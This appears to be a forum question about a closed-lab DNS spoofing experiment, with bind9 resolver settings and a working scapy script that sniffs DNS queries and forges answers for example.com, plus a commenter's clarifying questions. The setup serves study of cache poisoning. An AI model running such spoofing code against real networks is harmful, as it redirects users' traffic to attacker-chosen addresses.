# Problem in receiving answers from bind DNS server

Tags: linux, dns, bind

As a part of an experiment I'm running 3 Ubuntu machines in the [Create](https://www.create.iucc.ac.il/index.php) environment. 
Call them client, server and attacker. 
Client connected to server. (10.1.1.2 and 10.1.1.3, respectively)
Server connected to attacker. (10.1.2.3 and 10.1.2.2, respectively)
Server runs a bind9 server, and is intended to simulate a recursive resolver that forwards any query to attacker, which operates as MITM. 
In the server, I've edited *named.conf.options*:

```
options {
    directory "/var/cache/bind";
    dump-file "/var/cache/bind/dump.db";

    recursion yes;
    allow-recursion { any; };
    allow-query { any; };
    allow-query-cache { any; };

    forwarders { 10.1.2.2; };
    forward only;

    dnssec-validation no;

    auth-nxdomain no;
    listen-on-v6 { any; };
}
```

In the Client, I've edited *resolv.conf*:

```
nameserver 10.1.1.3
nameserver 192.168.252.1
search create.iucc.ac.il
```

The second ns is the Create environment ns, it's not connected to the internet and only answer the query for "create.iucc.ac.il". 
In the attacker I'm running the following scapy script:

```
 from scapy.all import *
    
    def callback(pkt):
        if (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0):
            if 'example.com' in str(pkt['DNS Question Record'].qname):
                spfResp = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                DNS(id=pkt[DNS].id, qr=1, aa=1,\
                qd=pkt[DNS].qd,an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=1600, rdata="6.6.6.6"))
                send(spfResp, verbose=1)
                return 'Spoofed DNS Response Sent'
    
    sniff(filter="dst port 53", prn=callback)
```

Which is supposed to return answers for queries about "example.com". 
However, when I use

```
dig example.com
```

In the client, I receive SERVFAIL from 10.1.1.3. The scapy script does send the response to the server.
The only time the client receives an answer (same one as the script intended) is when I spam the "dig example.com" command.
Why is it not working? Are my configurations correct?

Comment: What is 192.168.252.1 doing in your setup ? Does things work already between client and server without attacker ? Have you looked in the logfiles ? 10.1.2.2 is your attacker ? If yes I do not understand why the server is configured to forward requests to it.